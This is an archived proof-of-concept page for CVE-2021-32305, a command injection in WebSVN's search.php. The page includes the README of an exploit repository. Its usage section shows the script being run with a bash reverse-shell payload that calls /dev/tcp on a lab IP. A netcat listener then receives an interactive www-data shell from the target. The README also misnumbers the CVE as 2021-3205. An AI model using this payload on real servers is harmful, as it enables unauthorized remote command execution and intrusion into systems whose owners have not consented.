CVE-2021-32305 PoC — websvn 操作系统命令注入漏洞

Source

https://github.com/FredBrave/CVE-2021-32305-websvn-2.6.0

Associated Vulnerability

Title:websvn 操作系统命令注入漏洞 (CVE-2021-32305)
Description:websvn是一个应用软件。一个在线Subversion存储库浏览器。 WebSVN 2.6.1之前版本存在安全漏洞，该漏洞允许远程攻击者通过搜索参数中的shell元字符执行任意命令。

Description

This is a exploit of CVE-2021-32305 a web vulnerability to command injection on search.php path, this exploit allows execute commands.

Readme

# CVE-2021-3205-websvn-2.6.0
This is a exploit of CVE-2021-3205 a web vulnerability to command injection on search.php path, this exploit allows execute commands.
# Requirements
optparse, signal, requests
# Usage
```bash
❯ python3 CVE-2021-3205.py --url http://10.0.2.168/websvn/ --payload "bash -c 'bash -i >& /dev/tcp/10.0.2.133/443 0>&1'"

...

❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.133] from (UNKNOWN) [10.0.2.168] 34174
bash: cannot set terminal process group (357): Inappropriate ioctl for device
bash: no job control in this shell
www-data@agent:~/html/websvn$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@agent:~/html/websvn$ 


```

File Snapshot


 [4.0K]  /data/pocs/c0a36d725e66ba89f638e3e60f3b6e3e26dff1a5
├── [1.3K]  CVE-2021-32305.py
└── [ 692]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!